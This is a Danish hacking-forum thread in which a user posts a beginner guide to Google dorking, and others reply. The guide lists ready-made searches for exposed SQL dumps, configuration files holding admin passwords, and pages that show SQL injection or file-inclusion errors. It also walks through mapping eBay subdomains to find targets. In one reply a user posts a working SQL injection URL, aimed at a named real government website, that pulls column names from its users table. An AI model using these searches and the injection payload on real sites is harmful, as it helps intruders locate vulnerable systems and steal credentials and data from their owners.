Tråd bedømmelse:
  • 1 Stemmer - 5 Gennemsnit
  • 1
  • 2
  • 3
  • 4
  • 5
Guide til google dorking
24-06-2015, 19:57
#1
Guide til google dorking
Hvad er google dorking?

Google dorking er ganske enkelt, at man bruger specifikke søgninger via google til eksempelvis at identificere sårbarheder på nettet, samle informationer mod sit mål, eller finde offentligt tilgængelige filer, der ikke bevist skal være tilgængelige (eksempelvis backup, sql dumps, konfigurationsfiler o.l). I denne guide vil jeg give en hurtig introduktion til simpel, men effektiv google dorking på begyndervenligt niveau med en række eksempler til at vise, hvor effektivt google dorking kan være.
Det positive ved google dorking er, hvor nemt og effektivt det kan være til at finde sårbarheder, mens det negative er, at det er så kendt en metode, at de fleste sårbarheder typisk er blevet fundet af andre før, og samtidig dækker det kun over, hvad google har indekseret, som langt fra er alt.

Google search operators

Google search operators er "parametre", du kan bruge til at gøre din søgning på google mere effektiv. Du kan læse mere om dem og deres forskellige funktioner på http://www.googleguide.com/advanced_oper...rence.html

De operators, der er mest effektive til google dorking er typisk:

inurl: specificerer, hvad der skal stå i url bar på de resultater, du søger efter.
Eksempel: inurl:wp-admin <--- eksempel på wordpress-dorking, hvor man bruger inurl til at søge efter wordpress-sider, hvis admin-login er indekseret hos google

site: specificerer domænet/domænetyper der skal fokuseres på i søgninger.
Eksempel: site:dk <--- sørger for, at alle søgninger kun er .dk domæner
Eksempel: site:eb.dk <--- specificerer eb.dk som det eneste domæne, du ønsker resultater fra - dette kan være praktisk at gøre til målrettet dorking

intext: specificerer, hvad der skal stå i sidens tekst
Eksempel: intext:"you have an error in your sql syntax" <--- eksempel på, hvordan man hurtigt kan finde sider med sql injection sårbarheder

intitle: specificerer, hvad der skal stå i titel på hjemmesiden
Eksempel: intitle:index of /weekly cpbackup <--- eksempel på dorking efter cpanel backups (lånt fra ghdb)

ext: specificerer file extension på siden
eksempel: ext:php <--- viser kun resultater der er kodet i php

Disse eksempler er ret simple og knapt så interressante, medmindre man tilføjer lidt mere til dem, som gør dem mere praktiske, som vi nu kommer ind på.

Eksempler på dorking:

dorking efter kritiske filer:

Der er desværre for mange programmører, der lader backups, sql dumps osv. ligge offentligt tilgængeligt på deres webservere uden at tænke over konsekvenserne. Den slags kan man hurtigt finde nogle gode eksempler på med denne dork:
inurl:backup ext:sql -github - her kan man evt. også specificere lande, hvor Danmark også har eksempler på dette. Eksempel: inurl:backup ext:sql site:dk og ext:sql site:dk - den kan tweakes en del alt efter, hvad man naturligvis leder efter

Andre eksempler:filer:

ext:conf intext:password intext:admin -google -github <--- denne dork giver 2470 eksempler på sider, hvor der er konfigurationsfiler med admin og password i teksten på konfigurationsfilerne. Her skrives der -google og -github for at reducere en stor del af resultaterne fra google code og github, da de ikke er brugbare

ext:ini intext:password intext:admin -google -github <--- samme koncept som ovenstående, bare .ini frem for .conf

Dette er som sagt kun eksempler, og der er masser af andre metoder til lignende resultater - prøv jer frem, og I vil hurtigt blive overraskede over, hvor meget man kan finde på ingen tid!

subdomæne enumeration:

Når man skal lave en penetration testing, skal man bruge en del tid på at analysere sit mål og finde forskellige vectors, hvor subdomæner er yderst relevante. For at identificere forskellige subdomæner, prøver vi som vores eksempel at dorke lidt på ebay.com, som har en stor del. Nogle programmeringssprog er kendte for dårlig sikkerhed, deriblandt coldfusion med subzero-exploitet og cgi med shellshock. Begge sårbarhederne er ret forældede og virker ikke så tit, men de er gode eksempler til, hvad vi vil prøve. I vores eksempel prøver vi at finde subdomæner og specificerer efter domæner, der kører coldfusion

Vores første dork bliver site:*.ebay.com -www. Dette giver os alle søgeresultater på ebays subdomæner, som google kan finde på nær dem med www i og ebay.com i sig selv, hvor der dukker 12.000.000 resultater op. Hvis vi ændrer vores dork til site*.ebay.com ext:cfm bliver resultatet dog mere overskueligt. Vores første domæne vi ser i søgning er investor.ebay.com, som kører coldfusion. Derefter kan vi ændre dork til site*.ebay.com ext:cfm -investor for at få alle ebays domæner med coldfusion, som ikke er investor.ebay.com (da vi allerede kender den). Sådan kan man fortsætte igennem, til man har alle domæner med coldfusion, hvoefter man kan prøve andre file extensions (php, asp, aspx, jsp, cgi, do for at komme med nogle eksempler). Dette er ikke "hacking" i sig selv, men er en effektiv måde til at finde interressante subdomæner, som man bagefter kan finde sårbarheder på.

Dorking efter sårbarheder:

Til sidst vil jeg give nogle gode eksempler på, hvordan man kan finde sider, der har typiske sårbarheder som sql injection. Der findes flere fejlkoder til oracle sql server, msaccess, pgsql osv. men tager kun mysql og mssql som eksempel i de to første, og .dk kan selvfølgelig skiftes ud med en masse andet, eksempelvis .gov

site:dk intext:"you have an error in your sql syntax" -eksperten.dk
site:dk intext:"microsoft ole db provider for" -eksperten.dk

inurl:index.php?page=*.php intext:"failed to open stream" -forum <--- eksempel på, hvordan man hurtigt kan finde nogle lfi/rfi-sårbarheder. At siderne giver fejlkoder betyder ikke nødvendigvis, at de er sårbare, men man kan hurtigt finde nogle sårbare sider, hvis man bare lige prøver sig frem. page kan hedde noget andet som eksempelvis site,inc,path og andet og *.php kan være *.htm, *.html, *.txt osv

Mere magter jeg ikke lige at tilføje til guiden indtil videre, da google dorking som sagt er et ret stort emne, som dækker bredt. Hvis folk vil have flere effektive eksempler på google dorking, kan jeg klart anbefale at lurke lidt på https://www.exploit-db.com/google-hacking-database/. Jeg håber, at dette var brugbart for nogen :)

Disclaimer: Jeg tager (naturligvis) ikke ansvar for, hvad andre folk bruger info i denne guide til.
GOOD LUCK EBOLA-CHAN
I LOVE YOU EBOLA-CHAN
Find alle beskeder fra denne bruger
Citer denne besked i et svar
24-06-2015, 21:02
#2
RE: Guide til google dorking
Super god guide. :)
Og du har helt ret. Det er overraskende hvad man kan finde.
Det mest forunderlige jeg nogen sinde har fundet, var en PDF fil, med en rapport fra et Nessus scan på siden selv. :) Så slipper man jo selv for at scanne siden. :D
---
Writing a shellcode decoder stub in assembly is like talking gibberish in such a way that it is still perfectly intelligible. - iTick
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
24-06-2015, 21:49
#3
RE: Guide til google dorking
Jeg kan huske en artikel, hvor dorking blev brugt til at finde eksfiltrerede filer fra en række tilfældige inficeringer. De viste sig dog at være pænt HP. Herefter brugte de så de samme informationer til nye dorks, som de kunne bruge til opsporing af flere CnC servere fra den samme gruppe. Kan ikke lige finde kilden, men mener det var mere avanceret end en simpel "index of:" eller ftp query. Jeg leder videre ;)
Find alle beskeder fra denne bruger
Citer denne besked i et svar
24-06-2015, 22:07
#4
RE: Guide til google dorking
(24-06-2015, 21:02)iTick Skrev: Det mest forunderlige jeg nogen sinde har fundet, var en PDF fil, med en rapport fra et Nessus scan på siden selv. :) Så slipper man jo selv for at scanne siden. :D

haha, jeg fandt også engang det samme med en acunetix-scanning i pdf-format :D og ja, det er ret grinern, når folk laver den slags brølere
GOOD LUCK EBOLA-CHAN
I LOVE YOU EBOLA-CHAN
Find alle beskeder fra denne bruger
Citer denne besked i et svar
25-06-2015, 13:07
#5
RE: Guide til google dorking
Tak, det går meget hurtigt med at finde hjemmesider til at injecte.
Her er det første link jeg fik.

Dette er fra tablen users

Kode:
http://www.police.gov.bd/content.php?id=-275' UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.columns where table_name=0x7573657273--+
Find alle beskeder fra denne bruger
Citer denne besked i et svar
25-06-2015, 21:58
#6
RE: Guide til google dorking
Super godt arbejde R3dpill!
Don't learn to hack, hack to learn
Find alle beskeder fra denne bruger
Citer denne besked i et svar
27-06-2015, 08:43
#7
RE: Guide til google dorking
Velformuleret tutorial, udført til perfektion så selv de mest uerfarende kan forstå den.
Godt arbejde R3d!
Find alle beskeder fra denne bruger
Citer denne besked i et svar
« Ældre | Nyere »




User(s) browsing this thread: 1 Gæst(er)